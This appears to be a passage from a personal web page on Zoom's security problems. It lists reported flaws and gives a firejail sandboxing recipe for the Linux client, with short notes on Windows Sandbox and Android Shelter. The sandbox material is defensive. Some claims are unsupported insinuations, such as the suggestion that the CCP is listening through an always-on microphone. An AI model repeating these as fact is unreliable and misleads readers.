unrestricted access to user data. (In China, Zoom has a network of agents
acting under different names but using the same platform.)
Updates: More on Zoom problems
-
Vulnerabilities:
-
Privacy holes:
-
CitizenLab Report on Zoom:
-
Google now banned Zoom for its employees: Google has banned the popular
videoconferencing software Zoom from its employees’ devices, BuzzFeed
News has learned. Zoom, a competitor to Google’s own Meet app, has seen an
explosion of people using it to work and socialize from home and has become
a cultural touchstone during the coronavirus pandemic.
Read here.
-
Zoom zero-days for sale: People who trade in zero-day
exploits say there are two Zoom zero-days, one for Windows
and one for MacOS, on the market. See here for more detail.
-
Zoom uses the microphone on MacOSX even when not in a meeting.
Why is the Zoom app listening on my microphone when not in a meeting?
An update fixed the problem... but NOT the microphone activation itself, only the interface (the microphone indicator).
Zoom nevertheless continues to activate the microphone on MacOSX. Is the CCP listening?
How to increase privacy and security of using Zoom on Linux
Sandboxing. On the Linux platform, one solution is to always run the Zoom
videoconferencing software in a limited sandbox. Then the Zoom client
has no access to the user's files or to other processes running on the
system.
- Update: This recipe works for Zoom v. 3.5.361645.0301, but not for some
later versions, e.g. 3.5.374815.0324; see the update on this below.
Disable any unauthorized update/upgrade of the Zoom client. Do not install
the Zoom software from the standard repository. Use the static tar.gz archive
instead: select "Other Linux OS" for installation and uncompress the static
distribution into a safe directory. The disadvantage is that updates are
manual only: check the Zoom web site for new releases and read the changelog.
The advantage is that Zoom cannot silently install any unauthorized update or
software on the system.
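A minimal sketch of the manual install, assuming the archive has already been downloaded to the current directory and that ~/bin is chosen as the safe directory (this matches the firejail profile below; the exact archive name depends on the version downloaded from zoom.us):
mkdir -p ~/bin
tar -xf zoom_x86_64.tar.xz -C ~/bin   # creates ~/bin/zoom/ containing ZoomLauncher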
It also makes sense to register at Zoom with the institutional email but a
separate password, so that Zoom does not use the main institutional login (SSO
login). This might help against credential leaks in case of a Zoom software
vulnerability. Using the institutional email to register still ensures the
account is registered as "licensed."
Install firejail sandboxing (https://firejail.wordpress.com/):
sudo apt install firejail
- Firejail is a SUID program that reduces the risk of security breaches
by restricting the running environment of untrusted applications using
Linux namespaces and seccomp-bpf. ... Firejail can sandbox any type
of processes: servers, graphical applications, and even user login
sessions. The software includes security profiles for a large number
of Linux programs: Mozilla Firefox, Chromium, VLC, Transmission etc. To
start the sandbox, prefix your command with “firejail.”
Make a configuration file for Zoom in .config/firejail/
. Here is the
configuration file, named after the main Zoom executable: ZoomLauncher.profile
(given that the executable is ZoomLauncher):
# Note: to delete all firejail profiles for all local trusted apps
# run sudo firecfg --clean
# ----------------------------------------------------------------
# Duplication of zoom configs in noblacklist and whitelist
# sections fixes login credentials no save problem:
noblacklist ${HOME}/.config/zoomus.conf
noblacklist ${HOME}/.zoom
include /etc/firejail/disable-common.inc
include /etc/firejail/disable-devel.inc
include /etc/firejail/disable-programs.inc
include /etc/firejail/disable-passwdmgr.inc
whitelist ${HOME}/bin/zoom
whitelist ${HOME}/.config/zoomus.conf
whitelist ${HOME}/.zoom
whitelist ${HOME}/.cache/zoom
whitelist ${HOME}/downloads
include /etc/firejail/whitelist-common.inc
caps.drop all
netfilter
nodvd
nonewprivs
noroot
notv
protocol unix,inet,inet6
seccomp
private-tmp
# Needed for latest versions of Zoom and perhaps certain other Qt/QML apps
env QML_DISABLE_DISK_CACHE=1
Now the Zoom client can be started in the firejail sandbox:
firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher
To make it possible to use the standard graphical menus, one needs
to make a zoom.desktop startup file in the user's
.local/share/applications
directory. The Exec entry of the file must include the
firejail-based startup:
[Desktop Entry]
Name=Zoom Desktop [Jailed]
GenericName=Zoom videoconferencing
Comment=Zoom Desktop Client jailed
Exec=firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher %f
Icon=zoom.png
Terminal=false
Type=Application
Categories=Network;Internet;Education;Qt;
X-SuSE-translate=false
Firejail caveats
Firejail can end up sandboxing all of the user's applications, which is
often too restrictive (e.g. settings are not saved).
-
To force reconfiguring all applications to run in firejail (do not do
this if you are unsure), run:
sudo firecfg
-
To disable configuring all local applications to run in jail, do this:
sudo firecfg --clean
-
Do this (sudo firecfg --clean
) if you have problems starting applications
after installing firejail.
-
To check if an application starts in a jail by default, run it
from the terminal. If the terminal shows several lines like Reading profile
/etc/firejail/disable-common.inc
, then the application runs in a jail.
A newer version of the Zoom client (3.5.374815.0324) refused to run in the
jailed environment and hung.
A workaround for running recent Zoom versions in the jail:
add the line env QML_DISABLE_DISK_CACHE=1
to the firejail profile (as in the profile above).
QML_DISABLE_DISK_CACHE
"Disables the disk cache and forces re-compilation
from source for all QML and JavaScript files." (from the QML documentation)
How to increase privacy and security of using Zoom on Microsoft Windows
Here is a link about the sandbox in Windows 10: How to
use Windows Sandbox.
I have not tested how this works.
Android sandbox
For Android, one solution is to use the open source Shelter application;
then mobile Zoom can run in a secure container.
I have been running several programs that I do not want to give access to
my data inside Shelter. It works fine for me.
Advantages:
-
Contacts (the address book) are not leaked to Zoom if a separate address book
is used within Shelter.
-
All apps can be frozen to prevent them running all the time in the background;
this reduces the chance of data leaks as well as battery drain. Freezing
can be done automatically, after a timeout.
Links